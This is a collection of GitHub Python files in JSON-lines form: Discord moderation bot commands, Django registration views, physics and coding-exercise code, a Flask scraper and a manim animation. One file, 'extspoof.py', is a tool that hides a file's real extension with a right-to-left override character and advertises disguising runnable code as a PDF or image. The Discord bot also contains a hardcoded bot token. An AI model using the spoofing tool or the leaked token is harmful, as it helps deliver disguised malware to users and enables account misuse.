nrpe_setup.remove_check(shortname=service)\n","repo_name":"kedgeproject/kedge","sub_path":"vendor/github.com/openshift/origin/cmd/cluster-capacity/go/src/github.com/kubernetes-incubator/cluster-capacity/vendor/k8s.io/kubernetes/cluster/juju/layers/kubeapi-load-balancer/reactive/load_balancer.py","file_name":"load_balancer.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"54"} +{"seq_id":"73638654563","text":"#time 20\nclass Solution:\n def findMaxAverage(self, nums: list[int], k: int) -> float:\n windowEnd = k - 1\n windowStart = 0\n maxAverage = -(10**4)\n windowSum = sum(nums[windowStart:windowEnd])\n while windowEnd < len(nums):\n windowSum += nums[windowEnd]\n avg = windowSum/(windowEnd - windowStart + 1)\n maxAverage = max(avg, maxAverage)\n windowSum -= nums[windowStart]\n windowEnd += 1\n windowStart += 1\n \n return maxAverage","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"Sliding Window/Minimum Subarray Average I.py","file_name":"Minimum Subarray Average I.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71586552801","text":"# coding=utf-8\nimport re\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.password_validation import get_default_password_validators\nfrom django.forms import ChoiceField, ModelChoiceField\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext, gettext_lazy as _, ngettext\nfrom 
registration.backends.default.views import (ActivationView as OldActivationView,\n RegistrationView as OldRegistrationView)\nfrom registration.forms import RegistrationForm\nfrom sortedm2m.forms import SortedMultipleChoiceField\n\nfrom judge.models import Language, Organization, Profile, TIMEZONE\nfrom judge.utils.recaptcha import ReCaptchaField, ReCaptchaWidget\nfrom judge.utils.subscription import Subscription, newsletter_id\nfrom judge.widgets import Select2MultipleWidget, Select2Widget\n\nbad_mail_regex = list(map(re.compile, settings.BAD_MAIL_PROVIDER_REGEX))\n\n\nclass CustomRegistrationForm(RegistrationForm):\n username = forms.RegexField(regex=r'^\\w+$', max_length=30, label=_('Username'),\n error_messages={'invalid': _('A username must contain letters, '\n 'numbers, or underscores.')})\n timezone = ChoiceField(label=_('Timezone'), choices=TIMEZONE,\n widget=Select2Widget(attrs={'style': 'width:100%'}))\n language = ModelChoiceField(queryset=Language.objects.all(), label=_('Preferred language'), empty_label=None,\n widget=Select2Widget(attrs={'style': 'width:100%'}))\n organizations = SortedMultipleChoiceField(queryset=Organization.objects.filter(is_open=True),\n label=_('Organizations'), required=False,\n widget=Select2MultipleWidget(attrs={'style': 'width:100%'}))\n\n if newsletter_id is not None:\n newsletter = forms.BooleanField(label=_('Subscribe to newsletter?'), initial=True, required=False)\n\n if ReCaptchaField is not None:\n captcha = ReCaptchaField(widget=ReCaptchaWidget())\n\n def clean_email(self):\n if User.objects.filter(email=self.cleaned_data['email']).exists():\n raise forms.ValidationError(gettext('The email address \"%s\" is already taken. Only one registration '\n 'is allowed per address.') % self.cleaned_data['email'])\n if '@' in self.cleaned_data['email']:\n domain = self.cleaned_data['email'].split('@')[-1].lower()\n if (domain in settings.BAD_MAIL_PROVIDERS or\n any(regex.match(domain) for regex in bad_mail_regex)):\n raise forms.ValidationError(gettext('Your email provider is not allowed due to history of abuse. 
'\n 'Please use a reputable email provider.'))\n return self.cleaned_data['email']\n\n def clean_organizations(self):\n organizations = self.cleaned_data.get('organizations') or []\n max_orgs = settings.DMOJ_USER_MAX_ORGANIZATION_COUNT\n if len(organizations) > max_orgs:\n raise forms.ValidationError(ngettext('You may not be part of more than {count} public organization.',\n 'You may not be part of more than {count} public organizations.',\n max_orgs).format(count=max_orgs))\n return self.cleaned_data['organizations']\n\n\nclass RegistrationView(OldRegistrationView):\n title = _('Register')\n form_class = CustomRegistrationForm\n template_name = 'registration/registration_form.html'\n\n def get_context_data(self, **kwargs):\n if 'title' not in kwargs:\n kwargs['title'] = self.title\n kwargs['TIMEZONE_MAP'] = settings.TIMEZONE_MAP\n kwargs['password_validators'] = get_default_password_validators()\n kwargs['tos_url'] = settings.TERMS_OF_SERVICE_URL\n return super(RegistrationView, self).get_context_data(**kwargs)\n\n def register(self, form):\n user = super(RegistrationView, self).register(form)\n profile, _ = Profile.objects.get_or_create(user=user, defaults={\n 'language': Language.get_default_language(),\n })\n\n cleaned_data = form.cleaned_data\n profile.timezone = cleaned_data['timezone']\n profile.language = cleaned_data['language']\n profile.organizations.add(*cleaned_data['organizations'])\n profile.save()\n\n if newsletter_id is not None and cleaned_data['newsletter']:\n Subscription(user=user, newsletter_id=newsletter_id, subscribed=True).save()\n return user\n\n def get_initial(self, *args, **kwargs):\n initial = super(RegistrationView, self).get_initial(*args, **kwargs)\n initial['timezone'] = settings.DEFAULT_USER_TIME_ZONE\n initial['language'] = Language.objects.get(key=settings.DEFAULT_USER_LANGUAGE)\n return initial\n\n\nclass ActivationView(OldActivationView):\n title = _('Activation Key Invalid')\n template_name = 'registration/activate.html'\n\n def get_context_data(self, **kwargs):\n if 'title' not in kwargs:\n kwargs['title'] = self.title\n return super(ActivationView, self).get_context_data(**kwargs)\n\n\ndef social_auth_error(request):\n return render(request, 'generic-message.html', {\n 'title': gettext('Authentication failure'),\n 'message': request.GET.get('message'),\n })\n","repo_name":"DMOJ/online-judge","sub_path":"judge/views/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":782,"dataset":"github-code","pt":"54"} +{"seq_id":"15064832671","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport asyncio\r\n\r\nimport datetime\r\nclient = commands.Bot(command_prefix=\"+\")\r\n\r\n\r\n\r\n# Mute command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def mute(ctx, member : discord.Member, *, reason='No reason provided'):\r\n print(\"a\")\r\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\r\n if member == ctx.author:\r\n await ctx.send(\"You can't mute yourself!\")\r\n\r\n \r\n elif role not in ctx.guild.roles:\r\n await ctx.send(\"create muted role please\")\r\n\r\n \r\n \r\n else:\r\n print(\"a\")\r\n await member.add_roles(role)\r\n embed = discord.Embed(title=\"Muted.\", description=f\"**{ctx.author}** has muted **{member}** \\nReason: `{reason}`\", color = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Mute error handling\r\n@mute.error\r\nasync def mute_error(ctx, error):\r\n if 
isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Kick command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def kick(ctx, member: discord.Member, *, reason = None):\r\n \r\n # Message sent when reason is not given\r\n if reason == None:\r\n reason = \"No reason provided.\"\r\n\r\n # If message is directed to self\r\n if member == ctx.author:\r\n await ctx.send(\"You can't kick yourself!\")\r\n\r\n # If user checks pass\r\n else:\r\n await member.kick(reason=reason)\r\n embed = discord.Embed(title=\"Kicked.\", description=f\"**{ctx.author}** has kicked **{member}** \\nReason: `{reason}`\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Kick error handling\r\n@kick.error\r\nasync def kick_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Ban command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def ban(ctx, member: discord.Member, *, reason = None):\r\n if reason == None:\r\n reason = \"No reason provided.\"\r\n if member == ctx.author:\r\n await ctx.send(\"You can't ban yourself!\")\r\n\r\n else:\r\n await member.ban(reason=reason)\r\n embed = discord.Embed(title=\"Banned.\", description=f\"**{ctx.author}** has banned **{member}** \\nReason: `{reason}`\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Ban error handling\r\n@ban.error\r\nasync def ban_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Unban command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def unban(ctx, member : int):\r\n mem = await client.fetch_user(member)\r\n await ctx.guild.unban(discord.Object(id=member))\r\n embed = discord.Embed(title=\"Unbanned.\", description=f\"Succesfully unbanned **{mem}**.\", color = discord.Colour.green())\r\n await ctx.send(embed=embed)\r\n\r\n# Unban error handling\r\n@unban.error\r\nasync def unban_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Your id contained letters.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n\r\n # Unmute command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def unmute(ctx, member : discord.Member):\r\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\r\n if ctx.author == member:\r\n await ctx.send(\"You can't unmute yourself.\")\r\n elif role not in member.roles:\r\n await ctx.send(\"That member wasn't muted in the first place.\")\r\n else:\r\n await member.remove_roles(role)\r\n embed = discord.Embed(title=f\"Unmuted.\", description=f\"**{member}** was succesfully unmuted.\", colour = discord.Colour.green())\r\n await ctx.send(embed=embed)\r\n\r\n# Unmute error handling\r\n@unmute.error\r\nasync def unmute_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\ndef convert(time):\r\n\tpos = 
[\"s\", \"m\", \"h\", \"d\"]\r\n\r\n\ttime_dict = {\"s\": 1, \"m\": 60, \"h\": 3600, \"d\": 3600*24}\r\n\r\n\tunit = time[-1]\r\n\r\n\tif unit not in pos:\r\n\t\treturn[-1]\r\n\ttry:\r\n\t\tval = int(time[:-1])\r\n\texcept:\r\n\t\treturn -2\r\n\r\n\treturn val * time_dict[unit]\r\n\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def giveaway(ctx):\r\n\t# Giveaway command requires the user to have permissions to function properly\r\n\r\n\t# Stores the questions that the bot will ask the user to answer in the channel that the command was made\r\n\t# Stores the answers for those questions in a different list\r\n\tgiveaway_questions = ['Which channel will I host the giveaway in?', 'What is the prize?',\r\n\t\t\t\t\t\t 'How long should the giveaway run for (s|m|h|d)?', ]\r\n\tgiveaway_answers = []\r\n\r\n\t# Checking to be sure the author is the one who answered and in which channel\r\n\tdef check(m):\r\n\t\treturn m.author == ctx.author and m.channel == ctx.channel\r\n\r\n\t# Askes the questions from the giveaway_questions list 1 by 1\r\n\t# Times out if the host doesn't answer within 30 seconds\r\n\tfor question in giveaway_questions:\r\n\t\tawait ctx.send(question)\r\n\t\ttry:\r\n\t\t\tmessage = await client.wait_for('message', timeout=30.0, check=check)\r\n\t\texcept asyncio.TimeoutError:\r\n\t\t\tawait ctx.send(\r\n\t\t\t\t'You didn\\'t answer in time. Please try again and be sure to send your answer within 30 seconds of the question.')\r\n\t\t\treturn\r\n\t\telse:\r\n\t\t\tgiveaway_answers.append(message.content)\r\n\r\n\t# Grabbing the channel id from the giveaway_questions list and formatting is properly\r\n\t# Displays an exception message if the host fails to mention the channel correctly\r\n\ttry:\r\n\t\tc_id = int(giveaway_answers[0][2:-1])\r\n\texcept:\r\n\t\tawait ctx.send(f'You failed to mention the channel correctly. Please do it like this: {ctx.channel.mention}')\r\n\t\treturn\r\n\r\n\t# Storing the variables needed to run the rest of the commands\r\n\tchannel = client.get_channel(c_id)\r\n\tprize = str(giveaway_answers[1])\r\n\ttime = convert(giveaway_answers[2])\r\n\tif time == -1:\r\n\t\tawait ctx.send(f\"You didn't answer the time with a proper unit. Use (s|m|h|d)\")\r\n\t\treturn\r\n\telif time == -2: \r\n\t\tawait ctx.send(f\"The time must be an integer. 
Please enter an integer\")\r\n\t\treturn\r\n\r\n\t# Sends a message to let the host know that the giveaway was started properly\r\n\tasync def message(ctx, user:discord.Member, *, message=None):\r\n\t\tawait ctx.send(\r\n\t\tf'The giveaway for {prize} will begin shortly.\\nPlease direct your attention to {channel.mention}, this giveaway will end in {giveaway_answers[2]}')\r\n\r\n\t# Giveaway embed message\r\n\tgive = discord.Embed(color=discord.Color.orange())\r\n\tgive.set_author(name=f'Giveaway!', icon_url='https://i.imgur.com/VaX0pfM.png')\r\n\tgive.add_field(name=f'Prize: {prize}!',\r\n\t\t\t\t value=f'React with 🎉 to enter!\\n Ends in {round(time / 60, 2)} minutes!', inline=False)\r\n\tend = datetime.datetime.utcnow() + datetime.timedelta(seconds=time)\r\n\tgive.set_footer(text=f'Giveaway ends at {end} UTC!')\r\n\tmy_message = await channel.send(embed=give)\r\n\r\n\t# Reacts to the message\r\n\tawait my_message.add_reaction(\"🎉\")\r\n\tawait asyncio.sleep(time)\r\n\r\n\tnew_message = await channel.fetch_message(my_message.id)\r\n\r\n\t# Picks a winner\r\n\tusers = [user for reactions in new_message.reactions\r\n async for user in reactions.users()\r\n\t\tif user != client.user]\r\n\twinner = random.choice(users)\r\n\tprint(users)\r\n\t\r\n\r\n\t# Announces the winner\r\n\twinning_announcement = discord.Embed(color=discord.Color.orange())\r\n\twinning_announcement.set_author(name=f'The Giveaway has ended!', icon_url='https://i.imgur.com/DDric14.png')\r\n\twinning_announcement.add_field(name=f'🎉 Prize: {prize}',\r\n\t\t\t\t\t\t\t\t value=f'🥳 **Winner**: {winner.mention}\\n 🎫 **Number of Entrants**: {len(users)}',\r\n\t\t\t\t\t\t\t\t inline=False)\r\n\twinning_announcement.set_footer(text='Thanks for entering!')\r\n\tawait channel.send(embed=winning_announcement)\r\n\r\n\r\nclient.run(\"MTAzNDc3MDIxOTk0OTg5MTYzNA.GX-iAX.P0VLDYPT0UzHy9u-Qg1ugl-Bb_Khu6uyAPaA1A\")","repo_name":"rishi09saroj/mybotpy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35978953081","text":"import numpy as np\nfrom numpy import pi\nfrom utilities import find_magnetization\n\ndef hysteresis_loop(h_min, h_max, num_h_points, energy_func, derivative, second_derivative, min_x=-pi, max_x=pi, x_steps=50, args=()):\n \"\"\"Calculate the hysteresis loop for the Stoner Wohlfarth model\n\n Params:\n h_min (float): Minimum field\n h_max (float): Maximum field\n num_h_points (int): Number of field points\n energy_func (function):\n derivative (function):\n second_derivative (function):\n min_x (float): Minimum value in which to search for roots\n max_x (float): Maximum value in which to search for roots\n x_steps (int): Number of trials to do between [min_x, max_x] for finding roots\n args (tuple): Extra arguments that will be passed to the energy function and its derivatives\n\n Returns:\n np.ndarray: The hysteresis loop as (h, m) pairs\n \"\"\"\n h_values = np.linspace(h_max, h_min, num_h_points)\n\n mh_curve = []\n mag = -1\n\n for h in h_values:\n _, mag = find_magnetization(energy_func, derivative, second_derivative, mag, min_x, max_x, x_steps, args=((h,) + args))\n mh_curve.append((h, mag))\n\n return np.array(mh_curve)\n","repo_name":"nleehone/StonerWohlfarth","sub_path":"sw.py","file_name":"sw.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3100783161","text":"import 
os\nimport time\nimport sys\nimport base64\n\nlogo = \"\"\"\n\n\n@@@@@@@@ @@@ @@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@@\n@@! @@! !@@ @!! !@@ @@! @@@ @@! @@@ @@! @@@ @@!\n@!!!:! !@@!@! @!! !@@!! @!@@!@! @!@ !@! @!@ !@! @!!!:!\n!!: !: :!! !!: !:! !!: !!: !!! !!: !!! !!:\n: :: :: ::: ::: : ::.: : : : :. : : :. : :\n\n\n made by Loubaris | github.com/Loubaris\n\n\"\"\"\n\n\nmenu = \"\"\"\nCommands\n - rlt | Spoof extension using rlt exploit\n - ctm \n Create a pdf|png|etc file that runs python code w/o console.\n\n - exit | Exit program\nAPI\n - 'from extspoof import rlt'\n - 'rlt(\"filename new_extension\")'\n(ExtSpoof)>\"\"\"\n\n\ndef rlt(command):\n print(\"(ExtSpoof) - Starting Right To Left module.\\n\")\n try:\n command = command.split(\" \")\n except Exception as e:\n pass\n for i in range(5):\n try:\n command[i]\n except Exception as e:\n command.append(\"\")\n argv1 = command[1]\n argv2 = command[2]\n if os.path.exists(argv1):\n argv1_splitted = argv1.split(\".\")\n new_file_name = (argv1_splitted[0]+str(\"\\u202E\")+str(argv2[::-1])+\".\"+str(argv1_splitted[1]))\n try:\n os.rename(argv1, new_file_name)\n print(\"(ExtSpoof) - Successfully spoofed\")\n except Exception as e:\n printf(\"Error while renaming\\nError: {e}\")\n\n else:\n print(\"(ExtSpoof) - File was not found.\")\n\n\ndef ctm(command):\n print(\"(ExtSpoof) - Starting python code hiddener module.\\n\")\n try:\n command = command.split(\" \")\n except Exception as e:\n pass\n for i in range(5):\n try:\n command[i]\n except Exception as e:\n command.append(\"\")\n argv1 = command[1]\n argv2 = command[2]\n\n input_data = argv2\n output_file = argv1\n # Encode the PDF file into a string\n try:\n with open(input_data, \"rb\") as pdf_file:\n encoded_string = base64.b64encode(pdf_file.read()).decode(\"utf-8\")\n \n with open(output_file, \"a\") as new_code:\n new_code.write(\"\\n\\nimport base64\\n\\n\")\n new_code.write(\"encoded_pdf = \\\"\" + encoded_string + \"\\\"\\n\\n\")\n new_code.write(\"# Decode the PDF string back into bytes\\n\")\n new_code.write(\"decoded_pdf = base64.b64decode(encoded_pdf)\\n\\n\")\n new_code.write(\"# Write the decoded PDF bytes into a new file\\n\")\n new_code.write(\"with open(\\\"decoded.pdf\\\", \\\"wb\\\") as pdf_file:\\n\")\n new_code.write(\" pdf_file.write(decoded_pdf)\\n\")\n print(\"(ExtSpoof) - Success.\")\n\n except:\n print(\"ExtSpoof - File was not found.\")\n\n\ndef extspoof():\n os.system(\"cls\")\n print(logo)\n command = input(menu)\n command = command.split(\" \")\n if command[0] == \"rlt\":\n rlt(command)\n elif command[0] == \"ctm\":\n ctm(command)\n else:\n print(\"(ExtSpoof) - Unknown command\")\n os.system(\"set /p DUMMY=Press Enter to continue\")\n extspoof()\n\n if command[0] != \"exit\":\n os.system(\"set /p DUMMY=Press Enter to continue\")\n else:\n sys.exit()\n os.system(\"cls\")\n extspoof()\n\n\nif __name__ == \"__main__\":\n extspoof()\n","repo_name":"Loubaris/Extension-Spoofer","sub_path":"extspoof.py","file_name":"extspoof.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41080295978","text":"from flask import Flask, render_template\nimport pymongo\nfrom scrape_mars import scrape\napp = Flask(__name__)\n\n# setup mongo connection\nconn = \"mongodb://localhost:27017\"\nclient = pymongo.MongoClient(conn)\ndb=client.mars\ncollection = db.mars_data\n\n\n@app.route('/')\ndef index():\n \n scrape()\n data=list(db.mars_data.find())\n #print(data[0])\n \n\n 
return render_template(\"index.html\", mars_data=data[0])\n\n@app.route('/scrape')\ndef scraped_page():\n\n scrape()\n data=list(db.mars_data.find())\n length=len(data)\n \n return render_template(\"index.html\", mars_data=data[length-1]) \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n\n\n","repo_name":"svitlana-nazarchuk/web-scraping-challenge","sub_path":"Missions_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9026358265","text":"\"\"\"Add openid\n\nRevision ID: 6204b5143f0\nRevises: 52b8d5765c69\nCreate Date: 2012-09-15 05:39:46.922671\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6204b5143f0'\ndown_revision = '52b8d5765c69'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('openid', sa.String(length=255), nullable=False))\n op.alter_column('user', u'google_id',\n existing_type=sa.VARCHAR(length=255),\n nullable=True)\n op.alter_column('user', u'name',\n existing_type=sa.VARCHAR(length=32),\n nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('user', u'name',\n existing_type=sa.VARCHAR(length=32),\n nullable=False)\n op.alter_column('user', u'google_id',\n existing_type=sa.VARCHAR(length=255),\n nullable=False)\n op.drop_column('user', 'openid')\n ### end Alembic commands ###\n","repo_name":"mkandalf/prioritize","sub_path":"server/alembic/versions/6204b5143f0_add_openid.py","file_name":"6204b5143f0_add_openid.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35481281623","text":"import os\nfrom types import SimpleNamespace\nimport git\n\nfrom dimidium.lib.dosa_dtype import DosaDtype, convert_tvmDtype_to_DosaDtype\n\n\n__filedir__ = os.path.dirname(os.path.abspath(__file__))\nis_initiated = False\nconfig = SimpleNamespace()\nconfig.git_version = 'UNKNOWN'\nuc = {}\n\n\ndef init_singleton(config_dict, main_path=None):\n global config\n global is_initiated\n\n config.backend = SimpleNamespace()\n config.backend.input_latency = config_dict['input_latency']\n config.backend.output_latency = config_dict['output_latency']\n config.backend.create_rank_0_for_io = bool(config_dict['build']['create_rank_0_for_io'])\n config.backend.comm_message_pipeline_store = int(config_dict['build']['comm_message_interleaving']) # to be updated during runtime\n config.backend.comm_message_interleaving = int(config_dict['build']['comm_message_interleaving'])\n config.backend.maximum_pipeline_store_per_node = int(config_dict['build']['maximum_pipeline_store_per_node'])\n config.backend.generate_testbenchs = config_dict['build']['generate_testbenchs']\n config.backend.insert_debug_cores = bool(config_dict['build']['insert_debug_cores'])\n config.backend.tmux_parallel_build = int(config_dict['build']['parallel_builds_tmux'])\n config.backend.clean_build = bool(config_dict['build']['start_from_clean_build'])\n config.backend.comm_message_max_buffer_interleaving = int(config_dict['build']['max_buffer_interleaving'])\n config.backend.allow_multiple_cpu_clients = bool(config_dict['build']['allow_multiple_cpu_clients'])\n\n config.dtype = SimpleNamespace()\n config.dtype.default_dosa_flops_conv_factor = 
float(config_dict['dtypes']['default_flops_conv_factor'])\n config.dtype.dosa_flops_base_type = convert_tvmDtype_to_DosaDtype(config_dict['dtypes']['flops_base_type'])\n config.dtype.flops_base_str = config_dict['dtypes']['flops_base_str']\n config.dtype.flops_per_dsp_xilinx_fpgas = float(config_dict['dtypes']['flops_per_dsp_xilinx_fpgas'])\n config.dtype.dsps_per_dosa_flops_xilinx_fpgas = (1 / config.dtype.flops_per_dsp_xilinx_fpgas)\n config.dtype.dosa_flops_explanation_str = 'using {} DSPs per FLOPS'\\\n .format(config.dtype.dsps_per_dosa_flops_xilinx_fpgas)\n\n config.dtype.dosa_kappa = float(config_dict['dosa_learning']['kappa'])\n config.dtype.dosa_lambda = {}\n for k in config_dict['dosa_learning']['lambda']:\n if k == 'fallback':\n config.dtype.dosa_lambda[DosaDtype.UNKNOWN] = float(config_dict['dosa_learning']['lambda'][k])\n else:\n config.dtype.dosa_lambda[convert_tvmDtype_to_DosaDtype(k)] = float(config_dict['dosa_learning']['lambda'][k])\n\n config.quant = SimpleNamespace()\n config.quant.overwrite_imported_dtypes = False\n config.quant.overwrite_fixed_point_dtypes = False\n config.quant.numbers_already_scaled = True # TODO: change default to False (if quant module is merged)\n # config.quant.use_extra_accum_dtype = False\n config.quant.activation_dtype = DosaDtype.UNKNOWN\n config.quant.weight_dtype = DosaDtype.UNKNOWN\n config.quant.bias_dtype = DosaDtype.UNKNOWN\n config.quant.fixed_point_fraction_bits = None\n # config.quant.per_layer_dtypes = {}\n\n\n config.middleend = SimpleNamespace()\n config.middleend.engine_saving_threshold = float(config_dict['build']['engine_saving_threshold'])\n\n config.utilization = SimpleNamespace()\n config.utilization.dosa_mu_comp = float(config_dict['dosa_learning']['mu']['compute'])\n config.utilization.dosa_mu_mem = float(config_dict['dosa_learning']['mu']['memory'])\n config.utilization.xilinx_luts_to_dsp_factor = float(config_dict['utilization']['xilinx_luts_to_dsp_factor'])\n config.utilization.xilinx_lutram_to_bram_factor = float(config_dict['utilization']['xilinx_lutram_to_bram_factor'])\n config.utilization.dosa_xi = float(config_dict['utilization']['max_utilization_fpgas'])\n config.utilization.dosa_xi_exception = float(config_dict['utilization']['max_utilization_fpgas']) + \\\n float(config_dict['utilization']['utilization_exception'])\n\n config.dse = SimpleNamespace()\n config.dse.allow_throughput_degradation = bool(config_dict['dse']['allow_throughput_degradation'])\n config.dse.allowed_throughput_degradation = 0.0\n if config.dse.allow_throughput_degradation:\n config.dse.allowed_throughput_degradation = float(config_dict['dse']['allowed_throughput_degradation'])\n print(\"[DOSA:config:INFO] Allowing a degredation of the throughput of {} from the targeted throughput.\"\n .format(config.dse.allowed_throughput_degradation))\n\n config.dse.max_vertical_split = 500\n\n if main_path is not None:\n repo = git.Repo(path=main_path, search_parent_directories=True)\n cur_sha = repo.git.describe()\n config.git_version = cur_sha\n\n is_initiated = True\n return 0\n\n\ndef add_global_build_dir(abs_path):\n global config\n if config.backend.clean_build:\n os.system(\"rm -rf {}\".format(abs_path))\n else:\n print('[DOSA:build:INFO] Not deleting existing content in output dir.')\n os.system(\"mkdir -p {}\".format(abs_path))\n config.global_build_dir = abs_path\n config.global_report_dir = os.path.abspath('{}/tmp_rpt_dir'.format(abs_path))\n os.system(\"mkdir -p {}\".format(config.global_report_dir))\n os.system(\"cp 
{}/../backend/buildTools/templates/dosa_report.py {}/\".format(__filedir__, abs_path))\n return 0\n\n\ndef add_user_constraints(uc_dict):\n global uc\n uc = uc_dict\n return 0\n\n\n","repo_name":"cloudFPGA/DOSA","sub_path":"dimidium/lib/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"28841664980","text":"from manim import *\n\nconfig.background_color = BLACK\n\n\nclass LinearCommits(Scene):\n NO_COMMITS_ON_MASTER = 3\n NO_COMMITS_ON_FEATURE = 3\n ARROW_COLOR = GRAY\n COMMIT_FILL_COLOR = BLUE\n COMMIT_STROKE_COLOR = ORANGE\n COMMIT_LABEL_COLOR = BLACK\n HEAD_REF_COLOR = RED\n BRANCH_REF_COLOR = GREEN\n\n def construct(self):\n commits_on_feature = []\n arrows_between_master_commits = []\n\n self.intro()\n\n master_ref = self.create_branch_ref('master')\n init = self.show_command(\"git init\", None)\n self.play(FadeIn(master_ref))\n\n head_ref = self.create_head_ref()\n head_ref.next_to(master_ref, UP)\n self.play(FadeIn(head_ref))\n\n head_to_master_arrow = self.create_arrow_between_refs(\n head_ref, master_ref, DOWN)\n self.play(FadeIn(head_to_master_arrow))\n\n # create the commits\n commits_on_master = [self.create_commit(f'M{idx}') for idx in range(self.NO_COMMITS_ON_MASTER)]\n\n # arrange the commits and create the arrows between them\n for idx in range(1, len(commits_on_master)):\n commits_on_master[idx].next_to(\n commits_on_master[idx - 1], RIGHT)\n arrows_between_master_commits.append(self.create_arrow_between_commits(\n commits_on_master[idx], commits_on_master[idx - 1]))\n\n g = Group(master_ref, head_ref, head_to_master_arrow)\n self.play(FadeOut(g))\n\n # show the commits\n cmd = None\n master_to_commit_arrow = None\n for idx in range(len(commits_on_master)):\n cmd = self.show_command(f'git commit -m \\'M{idx}\\'', after=init if cmd is None else cmd)\n\n # show new commit\n self.play(FadeIn(commits_on_master[idx]))\n # connect the current commit with the previous one\n if idx > 0:\n self.play(FadeIn(arrows_between_master_commits[idx - 1]))\n # remove the arrow between master and commit\n self.remove(master_to_commit_arrow)\n\n # move the master ref\n if idx == 0:\n master_ref.next_to(commits_on_master[idx], UP)\n self.add(master_ref)\n else:\n self.play(master_ref.animate.next_to(\n commits_on_master[idx], UP))\n\n # create new arrow between master and commit\n master_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n master_ref, commits_on_master[idx], UP)\n self.play(FadeIn(master_to_commit_arrow))\n\n # remove the arrow between head and master\n self.remove(head_to_master_arrow)\n\n # move the head ref\n if idx == 0:\n head_ref.next_to(master_ref, UP)\n self.add(head_ref)\n else:\n self.play(head_ref.animate.next_to(master_ref, UP))\n\n # create new arrow between head and master\n head_to_master_arrow = self.create_arrow_between_refs(\n head_ref, master_ref, DOWN)\n self.play(FadeIn(head_to_master_arrow))\n\n #\n # NEW FEATURE BRANCH\n #\n\n # create a new branch based on the last commit\n feature_ref = self.create_branch_ref(\"feature\")\n feature_ref.next_to(commits_on_master[-1], DOWN)\n\n cmd = self.show_command(\"git branch feature\", after=cmd)\n\n self.play(FadeIn(feature_ref))\n\n feature_to_commit_arrow = self.create_arrow_between_ref_and_commit(\n feature_ref, commits_on_master[-1], DOWN)\n self.play(FadeIn(feature_to_commit_arrow))\n\n # remove the arrow between head and master\n 
